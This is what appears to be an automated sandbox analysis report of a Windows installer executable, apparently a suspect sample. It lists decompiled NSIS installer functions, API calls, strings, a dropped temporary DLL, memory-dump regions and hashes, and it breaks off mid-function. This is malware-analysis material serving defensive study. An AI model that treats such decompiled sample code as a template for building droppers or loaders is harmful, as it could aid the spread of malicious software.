								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
									__eflags = _t102;
								} while (_t102 != 0);
								_t71 =  *0x41f8fc; // 0x3123a
								 *((intOrPtr*)(_t111 + 0x3c)) = _t71;
								E00405D7C(0x424780, _t111 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L32;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E00403419( *0x41f8f8);
					_t77 = E00403403( &_a4, 4);
					__eflags = _t77;
					if(_t77 == 0) {
						goto L32;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L32;
					}
					goto L28;
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x424758) & 0x00007e00) + 0x200;
						__eflags = _t110 - _t82;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						_t83 = E00403403(0x4178f8, _t107);
						__eflags = _t83;
						if(_t83 == 0) {
							E00402E52(1);
							L32:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x424758;
						if( *0x424758 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402E52(0);
							}
							goto L20;
						}
						E00405D7C( &_v40, 0x4178f8, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t89;
						_t104 =  *0x41f8f8; // 0x0
						 *0x424800 =  *0x424800 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t110;
						 *0x424758 = _t104;
						if(_t92 > _t110) {
							goto L32;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v12 = _v12 + 1;
							_t110 = _t92 - 4;
							__eflags = _t107 - _t110;
							if(_t107 > _t110) {
								_t107 = _t110;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t110 -  *0x41f908; // 0xb5b
						if(__eflags < 0) {
							_v8 = E004066E8(_v8, 0x4178f8, _t107);
						}
						 *0x41f8f8 =  *0x41f8f8 + _t107;
						_t110 = _t110 - _t107;
						__eflags = _t110;
					} while (_t110 != 0);
					_t94 = 0;
					__eflags = 0;
					goto L24;
				}
			}































                                                              0x00402efc
                                                              0x00402eff
                                                              0x00402f02
                                                              0x00402f1c
                                                              0x00402f21
                                                              0x00402f34
                                                              0x00402f39
                                                              0x00402f3f
                                                              0x00000000
                                                              0x00402f41
                                                              0x00402f52
                                                              0x00402f63
                                                              0x00402f6a
                                                              0x00402f70
                                                              0x00402f72
                                                              0x00402f77
                                                              0x00402f79
                                                              0x00403064
                                                              0x00403066
                                                              0x0040306b
                                                              0x00403072
                                                              0x00000000
                                                              0x00000000
                                                              0x00403078
                                                              0x0040307b
                                                              0x004030a7
                                                              0x004030b7
                                                              0x004030b9
                                                              0x004030ca
                                                              0x004030e5
                                                              0x004030eb
                                                              0x004030ee
                                                              0x004030f3
                                                              0x00403112
                                                              0x00403122
                                                              0x00403134
                                                              0x00403139
                                                              0x0040313e
                                                              0x00403141
                                                              0x0040314a
                                                              0x0040314e
                                                              0x00403156
                                                              0x0040315b
                                                              0x0040315d
                                                              0x0040315d
                                                              0x0040315d
                                                              0x00403165
                                                              0x00403165
                                                              0x00403168
                                                              0x00403169
                                                              0x00403169
                                                              0x0040316c
                                                              0x0040316e
                                                              0x0040316e
                                                              0x0040316e
                                                              0x00403171
                                                              0x00403178
                                                              0x00403184
                                                              0x00403189
                                                              0x00000000
                                                              0x00403189
                                                              0x00000000
                                                              0x00403141
                                                              0x00000000
                                                              0x004030f5
                                                              0x00403083
                                                              0x0040308e
                                                              0x00403093
                                                              0x00403095
                                                              0x00000000
                                                              0x00000000
                                                              0x0040309e
                                                              0x004030a1
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00402f7f
                                                              0x00402f84
                                                              0x00402f89
                                                              0x00402f8d
                                                              0x00402f94
                                                              0x00402f99
                                                              0x00402f9b
                                                              0x00402f9d
                                                              0x00402f9d
                                                              0x00402fa1
                                                              0x00402fa6
                                                              0x00402fa8
                                                              0x00403101
                                                              0x00403143
                                                              0x00000000
                                                              0x00403143
                                                              0x00402fae
                                                              0x00402fb5
                                                              0x00403031
                                                              0x00403035
                                                              0x00403039
                                                              0x0040303e
                                                              0x00000000
                                                              0x00403035
                                                              0x00402fbe
                                                              0x00402fc3
                                                              0x00402fc6
                                                              0x00402fcb
                                                              0x00000000
                                                              0x00000000
                                                              0x00402fcd
                                                              0x00402fd4
                                                              0x00000000
                                                              0x00000000
                                                              0x00402fd6
                                                              0x00402fdd
                                                              0x00000000
                                                              0x00000000
                                                              0x00402fdf
                                                              0x00402fe6
                                                              0x00000000
                                                              0x00000000
                                                              0x00402fe8
                                                              0x00402fef
                                                              0x00000000
                                                              0x00000000
                                                              0x00402ff1
                                                              0x00402ff7
                                                              0x00403000
                                                              0x00403006
                                                              0x00403009
                                                              0x0040300b
                                                              0x00403011
                                                              0x00000000
                                                              0x00000000
                                                              0x00403017
                                                              0x0040301b
                                                              0x00403023
                                                              0x00403023
                                                              0x00403026
                                                              0x00403029
                                                              0x0040302b
                                                              0x0040302d
                                                              0x0040302d
                                                              0x00000000
                                                              0x0040302b
                                                              0x0040301d
                                                              0x00403021
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040303f
                                                              0x0040303f
                                                              0x00403045
                                                              0x00403051
                                                              0x00403051
                                                              0x00403054
                                                              0x0040305a
                                                              0x0040305a
                                                              0x0040305a
                                                              0x00403062
                                                              0x00403062
                                                              0x00000000
                                                              0x00403062

                                                              APIs
                                                              • GetTickCount.KERNEL32(76712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00402F05
                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\propser16364.exe,00000400), ref: 00402F21
                                                                • Part of subcall function 00405DC1: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\AppData\Roaming\propser16364.exe,80000000,00000003), ref: 00405DC5
                                                                • Part of subcall function 00405DC1: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405DE7
                                                              • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\propser16364.exe,C:\Users\user\AppData\Roaming\propser16364.exe,80000000,00000003), ref: 00402F6A
                                                              • GlobalAlloc.KERNEL32(00000040,0040A130), ref: 004030AC
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EFB, 004030C4
                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004030F5
                                                              • Error launching installer, xrefs: 00402F41
                                                              • "C:\Users\user\AppData\Roaming\propser16364.exe", xrefs: 00402EF1
                                                              • C:\Users\user\AppData\Roaming, xrefs: 00402F4C, 00402F51, 00402F57
                                                              • Inst, xrefs: 00402FD6
                                                              • soft, xrefs: 00402FDF
                                                              • C:\Users\user\AppData\Roaming\propser16364.exe, xrefs: 00402F0B, 00402F1A, 00402F2E, 00402F4B
                                                              • Null, xrefs: 00402FE8
                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403143
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                              • String ID: "C:\Users\user\AppData\Roaming\propser16364.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\propser16364.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                              • API String ID: 2803837635-1296731681
                                                              • Opcode ID: ca76f8d495ce3895f444a46e92879b513e81ddc2aff1e21a5d111d80dade61e3
                                                              • Instruction ID: 41f98d992e8437d8d417f3691d947d8f632b5d0a71237712da2b0bb715ca9b84
                                                              • Opcode Fuzzy Hash: ca76f8d495ce3895f444a46e92879b513e81ddc2aff1e21a5d111d80dade61e3
                                                              • Instruction Fuzzy Hash: 1B71E131A00259ABDB20AF64DD85B9E3BACEB44355F20803BF911BA2D1C77C9E418B5C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147stringtimeCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 77%
                                                              			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				CHAR* _t83;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402BCE(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405C2D(_t82);
				_push(_t82);
				_t83 = "uvlcopdlxoed";
				if(_t33 == 0) {
					lstrcatA(E00405BC0(E00406228(_t83, "C:\\Users\\Albus\\AppData\\Local\\Temp")), ??);
				} else {
					E00406228();
				}
				E00406503(_t83);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E0040659C(_t83);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405D9C(_t83);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405DC1(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E0040534F(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x4247e8;
						goto L32;
					} else {
						E00406228(0x40ac20, 0x425000);
						E00406228(0x425000, _t83);
						E004062BB(_t75, 0x40ac20, _t83, "C:\Users\Albus\AppData\Local\Temp\nsxAB11.tmp\ghvea31n0uw.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00406228(0x425000, 0x40ac20);
						_t62 = E00405944("C:\Users\Albus\AppData\Local\Temp\nsxAB11.tmp\ghvea31n0uw.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x4247e8 =  &( *0x4247e8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(_t83);
								_push(0xfffffffa);
								E0040534F();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E0040534F(0xffffffea,  *(_t85 - 8));
				 *0x424814 =  *0x424814 + 1;
				_t43 = E00403192(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75); // executed
				 *0x424814 =  *0x424814 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E004062BB(_t75, _t80, _t83, _t83, 0xffffffee);
					} else {
						E004062BB(_t75, _t80, _t83, _t83, 0xffffffe9);
						lstrcatA(_t83,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(_t83);
					E00405944();
					goto L29;
				}
				goto L33;
			}

















                                                              0x00401759
                                                              0x00401760
                                                              0x00401769
                                                              0x0040176c
                                                              0x0040176f
                                                              0x00401774
                                                              0x00401775
                                                              0x0040177c
                                                              0x00401798
                                                              0x0040177e
                                                              0x0040177f
                                                              0x0040177f
                                                              0x0040179e
                                                              0x004017a8
                                                              0x004017a8
                                                              0x004017ac
                                                              0x004017af
                                                              0x004017b4
                                                              0x004017b6
                                                              0x004017b8
                                                              0x004017bd
                                                              0x004017bd
                                                              0x004017c8
                                                              0x004017c8
                                                              0x004017d9
                                                              0x004017db
                                                              0x004017db
                                                              0x004017dc
                                                              0x004017dc
                                                              0x004017df
                                                              0x004017e2
                                                              0x004017e5
                                                              0x004017e5
                                                              0x004017ec
                                                              0x004017fb
                                                              0x00401800
                                                              0x00401803
                                                              0x00401806
                                                              0x00000000
                                                              0x00000000
                                                              0x00401808
                                                              0x0040180b
                                                              0x00401865
                                                              0x0040186a
                                                              0x004015b0
                                                              0x004027bf
                                                              0x004027bf
                                                              0x00402a5a
                                                              0x00402a5d
                                                              0x00402a5d
                                                              0x00000000
                                                              0x0040180d
                                                              0x00401813
                                                              0x0040181e
                                                              0x0040182b
                                                              0x00401836
                                                              0x0040184c
                                                              0x0040184c
                                                              0x0040184f
                                                              0x00000000
                                                              0x00401855
                                                              0x00401855
                                                              0x00401856
                                                              0x00401873
                                                              0x00402a63
                                                              0x00402a63
                                                              0x00402a63
                                                              0x00401858
                                                              0x00401858
                                                              0x00401859
                                                              0x00401492
                                                              0x00402387
                                                              0x00402387
                                                              0x00402387
                                                              0x00401856
                                                              0x0040184f
                                                              0x00402a65
                                                              0x00402a69
                                                              0x00402a69
                                                              0x00401883
                                                              0x00401888
                                                              0x00401896
                                                              0x0040189b
                                                              0x004018a1
                                                              0x004018a5
                                                              0x004018a7
                                                              0x004018af
                                                              0x004018bb
                                                              0x004018a9
                                                              0x004018a9
                                                              0x004018ad
                                                              0x00000000
                                                              0x00000000
                                                              0x004018ad
                                                              0x004018c4
                                                              0x004018ca
                                                              0x004018cc
                                                              0x00000000
                                                              0x004018d2
                                                              0x004018d2
                                                              0x004018d5
                                                              0x004018ed
                                                              0x004018d7
                                                              0x004018da
                                                              0x004018e3
                                                              0x004018e3
                                                              0x004018f2
                                                              0x004018f7
                                                              0x00402382
                                                              0x00000000
                                                              0x00402382
                                                              0x00000000

                                                              APIs
                                                              • lstrcatA.KERNEL32(00000000,00000000,uvlcopdlxoed,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
                                                              • CompareFileTime.KERNEL32(-00000014,?,uvlcopdlxoed,uvlcopdlxoed,00000000,00000000,uvlcopdlxoed,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2
                                                                • Part of subcall function 00406228: lstrcpynA.KERNEL32(?,?,00000400,00403533,00423F40,NSIS Error,?,00000007,00000009,0000000B), ref: 00406235
                                                                • Part of subcall function 0040534F: lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
                                                                • Part of subcall function 0040534F: lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
                                                                • Part of subcall function 0040534F: lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
                                                                • Part of subcall function 0040534F: SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
                                                                • Part of subcall function 0040534F: SendMessageA.USER32 ref: 004053E3
                                                                • Part of subcall function 0040534F: SendMessageA.USER32 ref: 004053FD
                                                                • Part of subcall function 0040534F: SendMessageA.USER32 ref: 0040540B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                              • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsxAB11.tmp\ghvea31n0uw.dll$uvlcopdlxoed
                                                              • API String ID: 1941528284-701491773
                                                              • Opcode ID: ebc504ea436e693e663a4b144fd74c24bb863413e05106ae1afc4e96b16114fd
                                                              • Instruction ID: 94ce822b9f6a6483fb8de35dc0b51f709499be211a85e0d844596cfba341e8bc
                                                              • Opcode Fuzzy Hash: ebc504ea436e693e663a4b144fd74c24bb863413e05106ae1afc4e96b16114fd
                                                              • Instruction Fuzzy Hash: 0541B931900515BACF107BB5DC45EAF7AB8DF05369B60863FF422B11E1CA7C8A528A6D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004411CD, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 344memoryfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 004414EE
                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0044154A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090883971.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                              Similarity
                                                              • API ID: AllocCreateFileVirtual
                                                              • String ID: 4f757b2bd7154d2291d1fbf3e19c21d4
                                                              • API String ID: 1475775534-1211045552
                                                              • Opcode ID: 274be0813142369cde93f854dd32d0e15d1793b395f3d539531ece8b4ffc6d26
                                                              • Instruction ID: b115dfec7a8868ec9f51dc7e0af53541f313ed7bc38c3bd1d8f918bc2e82a4f2
                                                              • Opcode Fuzzy Hash: 274be0813142369cde93f854dd32d0e15d1793b395f3d539531ece8b4ffc6d26
                                                              • Instruction Fuzzy Hash: 60E15E31D54388EDEF21CBE4DC06BEDBBB5AF04714F10008AE648FA1A1D7B50A84DB1A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004406FB, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 004407FD
                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 004409CA
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090883971.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                              Similarity
                                                              • API ID: CreateFileFreeVirtual
                                                              • String ID:
                                                              • API String ID: 204039940-0
                                                              • Opcode ID: 147d44b8edf9c1b8b83a1f4fe16a49ba33ba8049b8a36b976b4db1dee66b95c3
                                                              • Instruction ID: 776fe55e77a3a79dff5f0a3becb6bd457cb7bf25fcdf1c9714bf61c521c90209
                                                              • Opcode Fuzzy Hash: 147d44b8edf9c1b8b83a1f4fe16a49ba33ba8049b8a36b976b4db1dee66b95c3
                                                              • Instruction Fuzzy Hash: D7A12470D10209EFEF10DFE4C945BADBBB1BF08315F20805AE611BA2A1C3785A91DF19
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00405815, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00405815(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408384;
				_v36.Group = 0x408384;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408374;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                              0x00405820
                                                              0x00405824
                                                              0x00405827
                                                              0x0040582d
                                                              0x00405831
                                                              0x00405835
                                                              0x0040583d
                                                              0x00405844
                                                              0x0040584a
                                                              0x00405851
                                                              0x00405858
                                                              0x00405860
                                                              0x00405862
                                                              0x00000000
                                                              0x00405862
                                                              0x0040586c
                                                              0x00405873
                                                              0x00405889
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040588b
                                                              0x0040588f

                                                              APIs
                                                              • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405858
                                                              • GetLastError.KERNEL32 ref: 0040586C
                                                              • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405881
                                                              • GetLastError.KERNEL32 ref: 0040588B
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040583B
                                                              • C:\Users\user\AppData\Roaming, xrefs: 00405815
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming
                                                              • API String ID: 3449924974-1240368958
                                                              • Opcode ID: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
                                                              • Instruction ID: d6c2dc8a5c3265a730c97c9ba519fe28ff3708ad137b47d6a6340678ab851e8b
                                                              • Opcode Fuzzy Hash: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
                                                              • Instruction Fuzzy Hash: 60011A72D00219DADF10DFA1C944BEFBBB8EF04354F04803ADA45B6290E7789658CF99
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004065C3, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E004065C3(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                                                              0x004065da
                                                              0x004065e3
                                                              0x004065e5
                                                              0x004065e5
                                                              0x004065e9
                                                              0x004065fb
                                                              0x004065f5
                                                              0x004065f5
                                                              0x004065f5
                                                              0x004065ff
                                                              0x00406613
                                                              0x00406627
                                                              0x0040662e

                                                              APIs
                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004065DA
                                                              • wsprintfA.USER32 ref: 00406613
                                                              • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406627
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                              • String ID: %s%s.dll$UXTHEME$\
                                                              • API String ID: 2200240437-4240819195
                                                              • Opcode ID: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                                                              • Instruction ID: 9188928b716331f4199fdf2d451d87d069fed8801fbff73d7d84d2de41a49ecb
                                                              • Opcode Fuzzy Hash: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                                                              • Instruction Fuzzy Hash: D9F0F6706006097BEB249B68ED0DFEB365CAB08304F1404BEA186E10D1EA78D8358BA9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040209D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 60%
                                                              			E0040209D(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x424818");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x4247e8 =  *0x4247e8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402BCE(0xfffffff0);
				 *(_t34 + 8) = E00402BCE(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E0040534F(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
